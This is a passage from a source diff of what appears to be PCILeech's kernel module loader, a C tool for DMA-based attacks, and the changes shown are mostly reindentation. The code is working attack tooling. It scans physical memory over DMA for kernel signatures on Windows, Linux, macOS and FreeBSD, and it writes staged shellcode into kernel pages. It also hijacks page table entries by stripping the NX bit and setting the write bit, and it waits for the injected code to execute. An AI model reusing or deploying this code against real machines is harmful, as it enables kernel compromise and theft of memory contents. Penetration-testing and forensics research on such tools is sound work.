+    // 1: Set up kernel module shellcode (stage3)
+    //------------------------------------------------
+    if(dwPhysicalAddress == 0xffffffff) {
+        printf("KMD: Failed. Stage2 shellcode error.\n");
+        return FALSE;
+    }
+    if(ctx->cfg->fVerbose) {
+        printf("INFO: PA KMD BASE:  0x%08x\n", dwPhysicalAddress);
+    }
+    DeviceWriteDMA(ctx, dwPhysicalAddress + 0x1000, pbStage3, cbStage3, 0);
+    ctx->phKMD = (PKMDHANDLE)LocalAlloc(LMEM_ZEROINIT, sizeof(KMDHANDLE));
+    if(!ctx->phKMD) { return FALSE; }
+    ctx->phKMD->pk = (PKMDDATA)ctx->phKMD->pbPageData;
+    ctx->pk = ctx->phKMD->pk;
+    ctx->phKMD->dwPageAddr32 = dwPhysicalAddress;
+    DeviceReadDMA(ctx, ctx->phKMD->dwPageAddr32, ctx->phKMD->pbPageData, 4096, 0);
+    //------------------------------------------------
+    // 2: Retrieve physical memory range map and complete open action.
+    //------------------------------------------------
+    if(!KMD_GetPhysicalMemoryMap(ctx)) {
+        printf("KMD: Failed. Failed to retrieve physical memory map.\n");
+        KMDClose(ctx);
+        return FALSE;
+    }
+    ctx->cfg->qwKMD = ctx->phKMD->dwPageAddr32;
+    return TRUE;
 }
 
 BOOL KMDReadMemory_DMABufferSized(_Inout_ PPCILEECH_CONTEXT ctx, _In_ QWORD qwAddress, _Out_ PBYTE pb, _In_ DWORD cb)
 {
-	BOOL result;
-	if(!KMD_IsRangeInPhysicalMap(ctx->phKMD, qwAddress, cb) && !ctx->cfg->fForceRW) { return FALSE; }
-	ctx->pk->_size = cb;
-	ctx->pk->_address = qwAddress;
-	result = KMD_SubmitCommand(ctx, KMD_CMD_VOID);
-	if(!result) { return FALSE; }
-	result = KMD_SubmitCommand(ctx, KMD_CMD_READ);
-	if(!result) { return FALSE; }
-	return (cb == DeviceReadDMAEx(ctx, ctx->pk->DMAAddrPhysical, pb, cb, NULL, 0)) && ctx->pk->_result;
+    BOOL result;
+    if(!KMD_IsRangeInPhysicalMap(ctx->phKMD, qwAddress, cb) && !ctx->cfg->fForceRW) { return FALSE; }
+    ctx->pk->_size = cb;
+    ctx->pk->_address = qwAddress;
+    result = KMD_SubmitCommand(ctx, KMD_CMD_VOID);
+    if(!result) { return FALSE; }
+    result = KMD_SubmitCommand(ctx, KMD_CMD_READ);
+    if(!result) { return FALSE; }
+    return (cb == DeviceReadDMAEx(ctx, ctx->pk->DMAAddrPhysical, pb, cb, NULL, 0)) && ctx->pk->_result;
 }
 
 BOOL KMDWriteMemory_DMABufferSized(_Inout_ PPCILEECH_CONTEXT ctx, _In_ QWORD qwAddress, _In_ PBYTE pb, _In_ DWORD cb)
 {
-	BOOL result;
-	if(!KMD_IsRangeInPhysicalMap(ctx->phKMD, qwAddress, cb) && !ctx->cfg->fForceRW) { return FALSE; }
-	result = DeviceWriteDMA(ctx, ctx->pk->DMAAddrPhysical, pb, cb, 0);
-	if(!result) { return FALSE; }
-	ctx->pk->_size = cb;
-	ctx->pk->_address = qwAddress;
-	result = KMD_SubmitCommand(ctx, KMD_CMD_VOID);
-	if(!result) { return FALSE; }
-	return KMD_SubmitCommand(ctx, KMD_CMD_WRITE) && ctx->pk->_result;
+    BOOL result;
+    if(!KMD_IsRangeInPhysicalMap(ctx->phKMD, qwAddress, cb) && !ctx->cfg->fForceRW) { return FALSE; }
+    result = DeviceWriteDMA(ctx, ctx->pk->DMAAddrPhysical, pb, cb, 0);
+    if(!result) { return FALSE; }
+    ctx->pk->_size = cb;
+    ctx->pk->_address = qwAddress;
+    result = KMD_SubmitCommand(ctx, KMD_CMD_VOID);
+    if(!result) { return FALSE; }
+    return KMD_SubmitCommand(ctx, KMD_CMD_WRITE) && ctx->pk->_result;
 }
 
 BOOL KMDReadMemory(_Inout_ PPCILEECH_CONTEXT ctx, _In_ QWORD qwAddress, _Out_ PBYTE pb, _In_ DWORD cb)
 {
-	DWORD dwDMABufferSize = (DWORD)ctx->pk->DMASizeBuffer;
-	DWORD o = cb;
-	dwDMABufferSize = dwDMABufferSize ? dwDMABufferSize : 0x01000000;
-	while(TRUE) {
-		if(o <= dwDMABufferSize) {
-			return KMDReadMemory_DMABufferSized(ctx, qwAddress + cb - o, pb + cb - o, o);
-		} else if(!KMDReadMemory_DMABufferSized(ctx, qwAddress + cb - o, pb + cb - o, dwDMABufferSize)) {
-			return FALSE;
-		}
-		o -= dwDMABufferSize;
-	}
+    DWORD dwDMABufferSize = (DWORD)ctx->pk->DMASizeBuffer;
+    DWORD o = cb;
+    dwDMABufferSize = dwDMABufferSize ? dwDMABufferSize : 0x01000000;
+    while(TRUE) {
+        if(o <= dwDMABufferSize) {
+            return KMDReadMemory_DMABufferSized(ctx, qwAddress + cb - o, pb + cb - o, o);
+        } else if(!KMDReadMemory_DMABufferSized(ctx, qwAddress + cb - o, pb + cb - o, dwDMABufferSize)) {
+            return FALSE;
+        }
+        o -= dwDMABufferSize;
+    }
 }
 
 BOOL KMDWriteMemory(_Inout_ PPCILEECH_CONTEXT ctx, _In_ QWORD qwAddress, _Out_ PBYTE pb, _In_ DWORD cb)
 {
-	DWORD dwDMABufferSize = (DWORD)ctx->pk->DMASizeBuffer;
-	DWORD o = cb;
-	dwDMABufferSize = dwDMABufferSize ? dwDMABufferSize : 0x01000000;
-	while(TRUE) {
-		if(o <= dwDMABufferSize) {
-			return KMDWriteMemory_DMABufferSized(ctx, qwAddress + cb - o, pb + cb - o, o);
-		} else if(!KMDWriteMemory_DMABufferSized(ctx, qwAddress + cb - o, pb + cb - o, dwDMABufferSize)) {
-			return FALSE;
-		}
-		o -= dwDMABufferSize;
-	}
+    DWORD dwDMABufferSize = (DWORD)ctx->pk->DMASizeBuffer;
+    DWORD o = cb;
+    dwDMABufferSize = dwDMABufferSize ? dwDMABufferSize : 0x01000000;
+    while(TRUE) {
+        if(o <= dwDMABufferSize) {
+            return KMDWriteMemory_DMABufferSized(ctx, qwAddress + cb - o, pb + cb - o, o);
+        } else if(!KMDWriteMemory_DMABufferSized(ctx, qwAddress + cb - o, pb + cb - o, dwDMABufferSize)) {
+            return FALSE;
+        }
+        o -= dwDMABufferSize;
+    }
 }
 
 VOID KMDUnload(_Inout_ PPCILEECH_CONTEXT ctx)
 {
-	if(ctx->phKMD) {
-		KMD_SubmitCommand(ctx, KMD_CMD_TERMINATE);
-		KMDClose(ctx);
-	}
+    if(ctx->phKMD) {
+        KMD_SubmitCommand(ctx, KMD_CMD_TERMINATE);
+        KMDClose(ctx);
+    }
 }
 
 VOID KMDClose(_Inout_ PPCILEECH_CONTEXT ctx)
 {
-	if(ctx->phKMD) {
-		LocalFree(ctx->phKMD->pPhysicalMap);
-		LocalFree(ctx->phKMD);
-		ctx->phKMD = NULL;
-		ctx->pk = NULL;
-	}
+    if(ctx->phKMD) {
+        LocalFree(ctx->phKMD->pPhysicalMap);
+        LocalFree(ctx->phKMD);
+        ctx->phKMD = NULL;
+        ctx->pk = NULL;
+    }
 }
 
 BOOL KMDOpen_MemoryScan(_Inout_ PPCILEECH_CONTEXT ctx)
 {
-	SIGNATURE oSignatures[CONFIG_MAX_SIGNATURES];
-	PSIGNATURE pSignature;
-	DWORD dwSignatureMatchIdx, cSignatures = CONFIG_MAX_SIGNATURES;
-	KMDHANDLE_S12 h1, h2;
-	PDWORD pdwPhysicalAddress;
-	//------------------------------------------------
-	// 1: Load signature
-	//------------------------------------------------
-	if(0 == _stricmp(ctx->cfg->szKMDName, "LINUX_X64_46")) {
-		if(!KMD_Linux46KernelSeekSignature(ctx, &oSignatures[0])) {
-			printf("KMD: Failed. Error locating generic linux kernel signature.\n");
-			return FALSE;
-		}
-		pSignature = &oSignatures[0];
-	} else if(0 == _stricmp(ctx->cfg->szKMDName, "LINUX_X64_48")) {
-		if(!KMD_Linux48KernelSeekSignature(ctx, &oSignatures[0])) {
-			printf("KMD: Failed. Error locating generic linux kernel signature.\n");
-			return FALSE;
-		}
-		pSignature = &oSignatures[0];
-	} else if((0 == _stricmp(ctx->cfg->szKMDName, "MACOS")) || (0 == _stricmp(ctx->cfg->szKMDName, "OSX_X64"))) {
-		if(!KMD_MacOSKernelSeekSignature(ctx, &oSignatures[0])) {
-			printf("KMD: Failed. Error locating generic macOS kernel signature.\n");
-			return FALSE;
-		}
-		pSignature = &oSignatures[0];
-	} else if(0 == _stricmp(ctx->cfg->szKMDName, "FREEBSD_X64")) {
-		if(!KMD_FreeBSDKernelSeekSignature(ctx, &oSignatures[0])) {
-			printf("KMD: Failed. Error locating generic FreeBSD kernel signature.\n");
-			return FALSE;
-		}
-		pSignature = &oSignatures[0];
-	} else {
-		if(!Util_LoadSignatures(ctx->cfg->szKMDName, ".kmd", oSignatures, &cSignatures, 5)) {
-			printf("KMD: Failed. Error loading signatures.\n");
-			return FALSE;
-		}
-		//------------------------------------------------
-		// 2: Locate patch location (scan memory).
-		//------------------------------------------------
-		if(!KMD_FindSignature1(ctx, oSignatures, cSignatures, &dwSignatureMatchIdx)) {
-			printf("KMD: Failed. Could not find signature in memory.\n");
-			return FALSE;
-		}
-		pSignature = &oSignatures[dwSignatureMatchIdx];
-	}
-	if(!pSignature->chunk[2].cb || !pSignature->chunk[3].cb) {
-		printf("KMD: Failed. Error loading shellcode.\n");
-		return FALSE;
-	}
-	//------------------------------------------------
-	// 3: Set up patch data.
-	//------------------------------------------------
-	h1.qwPageAddr = pSignature->chunk[0].qwAddress;
-	h2.qwPageAddr = pSignature->chunk[1].qwAddress;
-	h1.dwPageOffset = 0xfff & pSignature->chunk[2].cbOffset;
-	h2.dwPageOffset = 0xfff & pSignature->chunk[3].cbOffset;
-	DeviceReadDMA(ctx, h1.qwPageAddr, h1.pbOrig, 4096, PCILEECH_MEM_FLAG_RETRYONFAIL);
-	DeviceReadDMA(ctx, h2.qwPageAddr, h2.pbOrig, 4096, PCILEECH_MEM_FLAG_RETRYONFAIL);
-	memcpy(h1.pbPatch, h1.pbOrig, 4096);
-	memcpy(h2.pbPatch, h2.pbOrig, 4096);
-	memcpy(h1.pbPatch + h1.dwPageOffset, pSignature->chunk[2].pb, pSignature->chunk[2].cb);
-	memcpy(h2.pbPatch + h2.dwPageOffset, pSignature->chunk[3].pb, pSignature->chunk[3].cb);
-	// patch jump offset in stage1
-	*(PDWORD)(h1.pbPatch + h1.dwPageOffset + STAGE1_OFFSET_CALL_ADD) += pSignature->chunk[3].cbOffset - pSignature->chunk[2].cbOffset;
-	// patch original stage1 data in stage2 (needed for stage1 restore)
-	memcpy(h2.pbPatch + h2.dwPageOffset + STAGE2_OFFSET_FN_STAGE1_ORIG, h1.pbOrig + h1.dwPageOffset, 8);
-	// patch offset to extra function relative to stage2 entry point: windows = n/a, linux=kallsyms_lookup_name, mac=kernel_mach-o_header
-	*(PDWORD)(h2.pbPatch + h2.dwPageOffset + STAGE2_OFFSET_EXTRADATA1) = pSignature->chunk[4].cbOffset - pSignature->chunk[3].cbOffset;
-	//------------------------------------------------
-	// 4: Write patched data to memory.
-	//------------------------------------------------
-	if(!DeviceWriteDMA(ctx, h2.qwPageAddr, h2.pbPatch, 4096, PCILEECH_MEM_FLAG_RETRYONFAIL | PCILEECH_MEM_FLAG_VERIFYWRITE)) {
-		printf("KMD: Failed. Signature found but unable write #2.\n");
-		return FALSE;
-	}
-	if(!DeviceWriteDMA(ctx, h1.qwPageAddr, h1.pbPatch, 4096, 0)) { // stage1 (must be written after stage2)
-		printf("KMD: Failed. Signature found but unable write #1.\n");
-		return FALSE;
-	}
-	printf("KMD: Code inserted into the kernel - Waiting to receive execution.\n");
-	//------------------------------------------------
-	// 5: wait for patch to reveive execution.
-	//------------------------------------------------
-	pdwPhysicalAddress = (PDWORD)(h2.pbLatest + h2.dwPageOffset + STAGE2_OFFSET_STAGE3_PHYSADDR);
-	do {
-		Sleep(100);
-		if(!DeviceReadDMA(ctx, h2.qwPageAddr, h2.pbLatest, 4096, PCILEECH_MEM_FLAG_RETRYONFAIL)) {
-			printf("KMD: Failed. DMA Read failed while waiting to receive physical address.\n");
-			return FALSE;
-		}
-	} while(!*pdwPhysicalAddress);
-	printf("KMD: Execution received - continuing ...\n");
-	//------------------------------------------------
-	// 6: Restore hooks to original.
-	//------------------------------------------------
-	DeviceWriteDMA(ctx, h2.qwPageAddr, h2.pbOrig, 4096, 0);
-	//------------------------------------------------
-	// 7: Set up kernel module shellcode (stage3) and finish.
-	//------------------------------------------------
-	return KMD_SetupStage3(ctx, *pdwPhysicalAddress, pSignature->chunk[4].pb, 4096);
+    SIGNATURE oSignatures[CONFIG_MAX_SIGNATURES];
+    PSIGNATURE pSignature;
+    DWORD dwSignatureMatchIdx, cSignatures = CONFIG_MAX_SIGNATURES;
+    KMDHANDLE_S12 h1, h2;
+    PDWORD pdwPhysicalAddress;
+    //------------------------------------------------
+    // 1: Load signature
+    //------------------------------------------------
+    if(0 == _stricmp(ctx->cfg->szKMDName, "LINUX_X64_46")) {
+        if(!KMD_Linux46KernelSeekSignature(ctx, &oSignatures[0])) {
+            printf("KMD: Failed. Error locating generic linux kernel signature.\n");
+            return FALSE;
+        }
+        pSignature = &oSignatures[0];
+    } else if(0 == _stricmp(ctx->cfg->szKMDName, "LINUX_X64_48")) {
+        if(!KMD_Linux48KernelSeekSignature(ctx, &oSignatures[0])) {
+            printf("KMD: Failed. Error locating generic linux kernel signature.\n");
+            return FALSE;
+        }
+        pSignature = &oSignatures[0];
+    } else if((0 == _stricmp(ctx->cfg->szKMDName, "MACOS")) || (0 == _stricmp(ctx->cfg->szKMDName, "OSX_X64"))) {
+        if(!KMD_MacOSKernelSeekSignature(ctx, &oSignatures[0])) {
+            printf("KMD: Failed. Error locating generic macOS kernel signature.\n");
+            return FALSE;
+        }
+        pSignature = &oSignatures[0];
+    } else if(0 == _stricmp(ctx->cfg->szKMDName, "FREEBSD_X64")) {
+        if(!KMD_FreeBSDKernelSeekSignature(ctx, &oSignatures[0])) {
+            printf("KMD: Failed. Error locating generic FreeBSD kernel signature.\n");
+            return FALSE;
+        }
+        pSignature = &oSignatures[0];
+    } else {
+        if(!Util_LoadSignatures(ctx->cfg->szKMDName, ".kmd", oSignatures, &cSignatures, 5)) {
+            printf("KMD: Failed. Error loading signatures.\n");
+            return FALSE;
+        }
+        //------------------------------------------------
+        // 2: Locate patch location (scan memory).
+        //------------------------------------------------
+        if(!KMD_FindSignature1(ctx, oSignatures, cSignatures, &dwSignatureMatchIdx)) {
+            printf("KMD: Failed. Could not find signature in memory.\n");
+            return FALSE;
+        }
+        pSignature = &oSignatures[dwSignatureMatchIdx];
+    }
+    if(!pSignature->chunk[2].cb || !pSignature->chunk[3].cb) {
+        printf("KMD: Failed. Error loading shellcode.\n");
+        return FALSE;
+    }
+    //------------------------------------------------
+    // 3: Set up patch data.
+    //------------------------------------------------
+    h1.qwPageAddr = pSignature->chunk[0].qwAddress;
+    h2.qwPageAddr = pSignature->chunk[1].qwAddress;
+    h1.dwPageOffset = 0xfff & pSignature->chunk[2].cbOffset;
+    h2.dwPageOffset = 0xfff & pSignature->chunk[3].cbOffset;
+    DeviceReadDMA(ctx, h1.qwPageAddr, h1.pbOrig, 4096, PCILEECH_MEM_FLAG_RETRYONFAIL);
+    DeviceReadDMA(ctx, h2.qwPageAddr, h2.pbOrig, 4096, PCILEECH_MEM_FLAG_RETRYONFAIL);
+    memcpy(h1.pbPatch, h1.pbOrig, 4096);
+    memcpy(h2.pbPatch, h2.pbOrig, 4096);
+    memcpy(h1.pbPatch + h1.dwPageOffset, pSignature->chunk[2].pb, pSignature->chunk[2].cb);
+    memcpy(h2.pbPatch + h2.dwPageOffset, pSignature->chunk[3].pb, pSignature->chunk[3].cb);
+    // patch jump offset in stage1
+    *(PDWORD)(h1.pbPatch + h1.dwPageOffset + STAGE1_OFFSET_CALL_ADD) += pSignature->chunk[3].cbOffset - pSignature->chunk[2].cbOffset;
+    // patch original stage1 data in stage2 (needed for stage1 restore)
+    memcpy(h2.pbPatch + h2.dwPageOffset + STAGE2_OFFSET_FN_STAGE1_ORIG, h1.pbOrig + h1.dwPageOffset, 8);
+    // patch offset to extra function relative to stage2 entry point: windows = n/a, linux=kallsyms_lookup_name, mac=kernel_mach-o_header
+    *(PDWORD)(h2.pbPatch + h2.dwPageOffset + STAGE2_OFFSET_EXTRADATA1) = pSignature->chunk[4].cbOffset - pSignature->chunk[3].cbOffset;
+    //------------------------------------------------
+    // 4: Write patched data to memory.
+    //------------------------------------------------
+    if(!DeviceWriteDMA(ctx, h2.qwPageAddr, h2.pbPatch, 4096, PCILEECH_MEM_FLAG_RETRYONFAIL | PCILEECH_MEM_FLAG_VERIFYWRITE)) {
+        printf("KMD: Failed. Signature found but unable write #2.\n");
+        return FALSE;
+    }
+    if(!DeviceWriteDMA(ctx, h1.qwPageAddr, h1.pbPatch, 4096, 0)) { // stage1 (must be written after stage2)
+        printf("KMD: Failed. Signature found but unable write #1.\n");
+        return FALSE;
+    }
+    printf("KMD: Code inserted into the kernel - Waiting to receive execution.\n");
+    //------------------------------------------------
+    // 5: wait for patch to reveive execution.
+    //------------------------------------------------
+    pdwPhysicalAddress = (PDWORD)(h2.pbLatest + h2.dwPageOffset + STAGE2_OFFSET_STAGE3_PHYSADDR);
+    do {
+        Sleep(100);
+        if(!DeviceReadDMA(ctx, h2.qwPageAddr, h2.pbLatest, 4096, PCILEECH_MEM_FLAG_RETRYONFAIL)) {
+            printf("KMD: Failed. DMA Read failed while waiting to receive physical address.\n");
+            return FALSE;
+        }
+    } while(!*pdwPhysicalAddress);
+    printf("KMD: Execution received - continuing ...\n");
+    //------------------------------------------------
+    // 6: Restore hooks to original.
+    //------------------------------------------------
+    DeviceWriteDMA(ctx, h2.qwPageAddr, h2.pbOrig, 4096, 0);
+    //------------------------------------------------
+    // 7: Set up kernel module shellcode (stage3) and finish.
+    //------------------------------------------------
+    return KMD_SetupStage3(ctx, *pdwPhysicalAddress, pSignature->chunk[4].pb, 4096);
 }
 
 BOOL KMDOpen_PageTableHijack(_Inout_ PPCILEECH_CONTEXT ctx)
 {
-	QWORD qwCR3 = ctx->cfg->qwCR3;
-	QWORD qwModuleBase;
-	SIGNATURE oSignatures[CONFIG_MAX_SIGNATURES];
-	PSIGNATURE pSignature;
-	DWORD cSignatures = CONFIG_MAX_SIGNATURES;
-	KMDHANDLE_S12 h1, h2;
-	PSIGNATUREPTE pSignaturePTEs;
-	QWORD cSignaturePTEs;
-	PDWORD pdwPhysicalAddress;
-	BOOL result;
-	//------------------------------------------------
-	// 1: Load signature and patch data.
-	//------------------------------------------------
-	result = Util_LoadSignatures(ctx->cfg->szKMDName, ".kmd", oSignatures, &cSignatures, 6);
-	if(!result) {
-		printf("KMD: Failed. Error loading signatures.\n");
-		return FALSE;
-	}
-	if(cSignatures != 1) {
-		printf("KMD: Failed. Singature count differs from 1. Exactly one signature must be loaded.\n");
-		return FALSE;
-	}
-	pSignature = &oSignatures[0];
-	if(pSignature->chunk[0].cb != 4096 || pSignature->chunk[1].cb != 4096) {
-		printf("KMD: Failed. Signatures in PTE mode must be 4096 bytes long.\n");
-		return FALSE;
-	}
-	pSignaturePTEs = (PSIGNATUREPTE)pSignature->chunk[5].pb;
-	cSignaturePTEs = pSignature->chunk[5].cb / sizeof(SIGNATUREPTE);
-	//------------------------------------------------
-	// 2: Locate patch location PTEs.
-	//------------------------------------------------
-	if(ctx->cfg->fPageTableScan) {
-		printf("KMD: Searching for PTE location ...\n");
-	}
-	result = Util_PageTable_FindSignatureBase(ctx, &qwCR3, pSignaturePTEs, cSignaturePTEs, &qwModuleBase);
-	if(!result) {
-		printf("KMD: Failed. Could not find module base by PTE search.\n");
-		return FALSE;
-	}
-	result = Util_PageTable_ReadPTE(ctx, qwCR3, qwModuleBase + pSignature->chunk[2].cbOffset, &h1.qwPTEOrig, &h1.qwPTEAddrPhys);
-	if(!result) {
-		printf("KMD: Failed. Could not access PTE #1.\n");
-		return FALSE;
-	}
-	result = Util_PageTable_ReadPTE(ctx, qwCR3, qwModuleBase + pSignature->chunk[3].cbOffset, &h2.qwPTEOrig, &h2.qwPTEAddrPhys);
-	if(!result) {
-		printf("KMD: Failed. Could not access PTE #2.\n");
-		return FALSE;
-	}
-	//------------------------------------------------
-	// 3: Set up patch data.
-	//------------------------------------------------
-	// hijack "random" page in memory if target page is above 4GB - dangerous!!!
-	h1.qwPageAddr = (h1.qwPTEOrig < 0x100000000) ? (h1.qwPTEOrig & 0xfffff000) : 0x90000;
-	h2.qwPageAddr = (h2.qwPTEOrig < 0x100000000) ? (h2.qwPTEOrig & 0xfffff000) : 0x91000;
-	h1.dwPageOffset = 0xfff & pSignature->chunk[2].cbOffset;
-	h2.dwPageOffset = 0xfff & pSignature->chunk[3].cbOffset;
-	memcpy(h1.pbPatch, pSignature->chunk[0].pb, 4096);
-	memcpy(h2.pbPatch, pSignature->chunk[1].pb, 4096);
-	memcpy(h1.pbPatch + h1.dwPageOffset, pSignature->chunk[2].pb, pSignature->chunk[2].cb);
-	memcpy(h2.pbPatch + h2.dwPageOffset, pSignature->chunk[3].pb, pSignature->chunk[3].cb);
-	// patch jump offset in stage1
-	*(PDWORD)(h1.pbPatch + h1.dwPageOffset + STAGE1_OFFSET_CALL_ADD) += pSignature->chunk[3].cbOffset - pSignature->chunk[2].cbOffset;
-	// patch original stage1 data in stage2 (needed for stage1 restore)
-	memcpy(h2.pbPatch + h2.dwPageOffset + STAGE2_OFFSET_FN_STAGE1_ORIG, pSignature->chunk[0].pb + h1.dwPageOffset, 8);
-	// patch offset to extra function relative to stage2 entry point: windows = n/a, linux=kallsyms_lookup_name
-	*(PDWORD)(h2.pbPatch + h2.dwPageOffset + STAGE2_OFFSET_EXTRADATA1) = pSignature->chunk[4].cbOffset - pSignature->chunk[3].cbOffset;
-	// calculate new PTEs
-	h1.qwPTE = 0x7ff0000000000fff & h1.qwPTEOrig; // Strip NX-bit and previous physical address
-	h2.qwPTE = 0x7ff0000000000fff & h2.qwPTEOrig; // Strip NX-bit and previous physical address
-	h1.qwPTE |= 0x00000002; // set write
-	h2.qwPTE |= 0x00000002; // set write
-	h1.qwPTE |= 0xfffff000 & h1.qwPageAddr;
-	h2.qwPTE |= 0xfffff000 & h2.qwPageAddr;
-	//------------------------------------------------
-	// 4: Write patched data and PTEs to memory.
-	//------------------------------------------------
-	DeviceReadDMA(ctx, h1.qwPageAddr, h1.pbOrig, 4096, 0);
-	DeviceReadDMA(ctx, h2.qwPageAddr, h2.pbOrig, 4096, 0);
-	if(!DeviceWriteDMA(ctx, h2.qwPageAddr, h2.pbPatch, 4096, PCILEECH_MEM_FLAG_RETRYONFAIL | PCILEECH_MEM_FLAG_VERIFYWRITE) ||
-		!DeviceWriteDMA(ctx, h1.qwPageAddr, h1.pbPatch, 4096, PCILEECH_MEM_FLAG_RETRYONFAIL | PCILEECH_MEM_FLAG_VERIFYWRITE)) {
-		printf("KMD: Failed. Signature found but unable write.\n");
-		return FALSE;
-	}
-	DeviceWriteDMA(ctx, h2.qwPTEAddrPhys, (PBYTE)&h2.qwPTE, sizeof(QWORD), 0);
-	Sleep(250);
-	DeviceWriteDMA(ctx, h1.qwPTEAddrPhys, (PBYTE)&h1.qwPTE, sizeof(QWORD), 0);
-	//------------------------------------------------
-	// 5: wait for patch to reveive execution.
-	//------------------------------------------------
-	printf("KMD: Page Table hijacked - Waiting to receive execution.\n");
-	pdwPhysicalAddress = (PDWORD)(h2.pbLatest + h2.dwPageOffset + STAGE2_OFFSET_STAGE3_PHYSADDR);
-	do {
-		Sleep(100);
-		if(!DeviceReadDMA(ctx, h2.qwPageAddr, h2.pbLatest, 4096, PCILEECH_MEM_FLAG_RETRYONFAIL)) {
-			printf("KMD: Failed. DMA Read failed while waiting to receive physical address.\n");
-			return FALSE;
-		}
-	} while(!*pdwPhysicalAddress);
-	printf("KMD: Execution received - continuing ...\n");
-	//------------------------------------------------
-	// 6: Restore hijacked memory pages.
-	//------------------------------------------------
-	DeviceWriteDMA(ctx, h1.qwPTEAddrPhys, (PBYTE)&h1.qwPTEOrig, sizeof(QWORD), 0);
-	DeviceWriteDMA(ctx, h2.qwPTEAddrPhys, (PBYTE)&h2.qwPTEOrig, sizeof(QWORD), 0);
-	Sleep(100);
-	DeviceWriteDMA(ctx, h1.qwPageAddr, h1.pbOrig, 4096, 0);
-	DeviceWriteDMA(ctx, h2.qwPageAddr, h2.pbOrig, 4096, 0);
-	//------------------------------------------------
-	// 7: Set up kernel module shellcode (stage3) and finish.
-	//------------------------------------------------
-	return KMD_SetupStage3(ctx, *pdwPhysicalAddress, pSignature->chunk[4].pb, 4096);
+    QWORD qwCR3 = ctx->cfg->qwCR3;
+    QWORD qwModuleBase;
+    SIGNATURE oSignatures[CONFIG_MAX_SIGNATURES];
+    PSIGNATURE pSignature;
+    DWORD cSignatures = CONFIG_MAX_SIGNATURES;
+    KMDHANDLE_S12 h1, h2;
+    PSIGNATUREPTE pSignaturePTEs;
+    QWORD cSignaturePTEs;
+    PDWORD pdwPhysicalAddress;
+    BOOL result;
+    //------------------------------------------------
+    // 1: Load signature and patch data.
+    //------------------------------------------------
+    result = Util_LoadSignatures(ctx->cfg->szKMDName, ".kmd", oSignatures, &cSignatures, 6);
+    if(!result) {
+        printf("KMD: Failed. Error loading signatures.\n");
+        return FALSE;
+    }
+    if(cSignatures != 1) {
+        printf("KMD: Failed. Singature count differs from 1. Exactly one signature must be loaded.\n");
+        return FALSE;
+    }
+    pSignature = &oSignatures[0];
+    if(pSignature->chunk[0].cb != 4096 || pSignature->chunk[1].cb != 4096) {
+        printf("KMD: Failed. Signatures in PTE mode must be 4096 bytes long.\n");
+        return FALSE;
+    }
+    pSignaturePTEs = (PSIGNATUREPTE)pSignature->chunk[5].pb;
+    cSignaturePTEs = pSignature->chunk[5].cb / sizeof(SIGNATUREPTE);
+    //------------------------------------------------
+    // 2: Locate patch location PTEs.
+    //------------------------------------------------
+    if(ctx->cfg->fPageTableScan) {
+        printf("KMD: Searching for PTE location ...\n");
+    }
+    result = Util_PageTable_FindSignatureBase(ctx, &qwCR3, pSignaturePTEs, cSignaturePTEs, &qwModuleBase);
+    if(!result) {
+        printf("KMD: Failed. Could not find module base by PTE search.\n");
+        return FALSE;
+    }
+    result = Util_PageTable_ReadPTE(ctx, qwCR3, qwModuleBase + pSignature->chunk[2].cbOffset, &h1.qwPTEOrig, &h1.qwPTEAddrPhys);
+    if(!result) {
+        printf("KMD: Failed. Could not access PTE #1.\n");
+        return FALSE;
+    }
+    result = Util_PageTable_ReadPTE(ctx, qwCR3, qwModuleBase + pSignature->chunk[3].cbOffset, &h2.qwPTEOrig, &h2.qwPTEAddrPhys);
+    if(!result) {
+        printf("KMD: Failed. Could not access PTE #2.\n");
+        return FALSE;
+    }
+    //------------------------------------------------
+    // 3: Set up patch data.
+    //------------------------------------------------
+    // hijack "random" page in memory if target page is above 4GB - dangerous!!!
+    h1.qwPageAddr = (h1.qwPTEOrig < 0x100000000) ? (h1.qwPTEOrig & 0xfffff000) : 0x90000;
+    h2.qwPageAddr = (h2.qwPTEOrig < 0x100000000) ? (h2.qwPTEOrig & 0xfffff000) : 0x91000;
+    h1.dwPageOffset = 0xfff & pSignature->chunk[2].cbOffset;
+    h2.dwPageOffset = 0xfff & pSignature->chunk[3].cbOffset;
+    memcpy(h1.pbPatch, pSignature->chunk[0].pb, 4096);
+    memcpy(h2.pbPatch, pSignature->chunk[1].pb, 4096);
+    memcpy(h1.pbPatch + h1.dwPageOffset, pSignature->chunk[2].pb, pSignature->chunk[2].cb);
+    memcpy(h2.pbPatch + h2.dwPageOffset, pSignature->chunk[3].pb, pSignature->chunk[3].cb);
+    // patch jump offset in stage1
+    *(PDWORD)(h1.pbPatch + h1.dwPageOffset + STAGE1_OFFSET_CALL_ADD) += pSignature->chunk[3].cbOffset - pSignature->chunk[2].cbOffset;
+    // patch original stage1 data in stage2 (needed for stage1 restore)
+    memcpy(h2.pbPatch + h2.dwPageOffset + STAGE2_OFFSET_FN_STAGE1_ORIG, pSignature->chunk[0].pb + h1.dwPageOffset, 8);
+    // patch offset to extra function relative to stage2 entry point: windows = n/a, linux=kallsyms_lookup_name
+    *(PDWORD)(h2.pbPatch + h2.dwPageOffset + STAGE2_OFFSET_EXTRADATA1) = pSignature->chunk[4].cbOffset - pSignature->chunk[3].cbOffset;
+    // calculate new PTEs
+    h1.qwPTE = 0x7ff0000000000fff & h1.qwPTEOrig; // Strip NX-bit and previous physical address
+    h2.qwPTE = 0x7ff0000000000fff & h2.qwPTEOrig; // Strip NX-bit and previous physical address
+    h1.qwPTE |= 0x00000002; // set write
+    h2.qwPTE |= 0x00000002; // set write
+    h1.qwPTE |= 0xfffff000 & h1.qwPageAddr;
+    h2.qwPTE |= 0xfffff000 & h2.qwPageAddr;
+    //------------------------------------------------
+    // 4: Write patched data and PTEs to memory.
+    //------------------------------------------------
+    DeviceReadDMA(ctx, h1.qwPageAddr, h1.pbOrig, 4096, 0);
+    DeviceReadDMA(ctx, h2.qwPageAddr, h2.pbOrig, 4096, 0);
+    if(!DeviceWriteDMA(ctx, h2.qwPageAddr, h2.pbPatch, 4096, PCILEECH_MEM_FLAG_RETRYONFAIL | PCILEECH_MEM_FLAG_VERIFYWRITE) ||
+        !DeviceWriteDMA(ctx, h1.qwPageAddr, h1.pbPatch, 4096, PCILEECH_MEM_FLAG_RETRYONFAIL | PCILEECH_MEM_FLAG_VERIFYWRITE)) {
+        printf("KMD: Failed. Signature found but unable write.\n");
+        return FALSE;
+    }
+    DeviceWriteDMA(ctx, h2.qwPTEAddrPhys, (PBYTE)&h2.qwPTE, sizeof(QWORD), 0);
+    Sleep(250);
